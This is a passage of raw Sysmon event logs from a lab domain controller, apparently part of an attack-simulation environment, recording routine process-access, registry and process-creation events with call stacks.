13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.029{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:58.982{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742S-1-5-21-2738482597-1131698221-3520544381-500v2.26|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|C=S-1-15-3-1|C=S-1-15-3-2|C=S-1-15-3-3|C=S-1-15-3-4|C=S-1-15-3-6|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-3215430884-1339816292-89257616-1145831019|C=S-1-15-3-3071617654-1314403908-1117750160-3581451107|C=S-1-15-3-593192589-1214558892-284007604-3553228420|C=S-1-15-3-3870101518-1154309966-1696731070-4111764952|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-2345035983-1170044712-735049875-2883010875|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2569730672-1095266119-53537203-1209375796|C=S-1-15-3-2569730672-1095266119-53537203-1209375796|C=S-1-15-3-2452736844-1257488215-2818397580-3305426111|C=S-1-15-3-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|M=microsoft.windows.cortana_cw5n1h2txyewy|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\|PFN=Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:30:00.545{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\E353614F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_E353614F-0000-0000-0000-100000000000.XML 13241300x800000000000000010895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:30:00.529{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Config SourceDWORD (0x00000001) 13241300x800000000000000010894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:30:00.529{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_2F6F85D1-BD71-4F32-93CC-49B3DCE2851F.XML 10341000x800000000000000010893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.014{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4758-6000-1F05-000000009A01}3040C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.014{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4758-6000-1F05-000000009A01}3040C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.014{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4758-6000-1E05-000000009A01}4708C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.014{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4758-6000-1E05-000000009A01}4708C:\Windows\system32\RunDll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.014{08A6967A-4288-6000-1000-000000009A01}11361460C:\Windows\system32\svchost.exe{08A6967A-4758-6000-1F05-000000009A01}3040C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.014{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4758-6000-1F05-000000009A01}3040C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.014{08A6967A-4288-6000-1000-000000009A01}11361460C:\Windows\system32\svchost.exe{08A6967A-4758-6000-1E05-000000009A01}4708C:\Windows\system32\RunDll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.014{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4758-6000-1E05-000000009A01}4708C:\Windows\system32\RunDll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4758-6000-1F05-000000009A01}3040C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4757-6000-1D05-000000009A01}42562916C:\Windows\System32\ie4uinit.exe{08A6967A-4758-6000-1F05-000000009A01}3040C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+176c|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.005{08A6967A-4758-6000-1F05-000000009A01}3040C:\Windows\System32\rundll32.exe10.0.14393.0 (rs1_release.160715-1616)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912MediumMD5=C7645D43451C6D94D87F4D07BDE59C89,SHA256=495BBA47FC43EE23054FCD419F2F00457162D1C04296900C6AEA551102A810F3,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{08A6967A-4757-6000-1D05-000000009A01}4256C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 10341000x800000000000000010878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 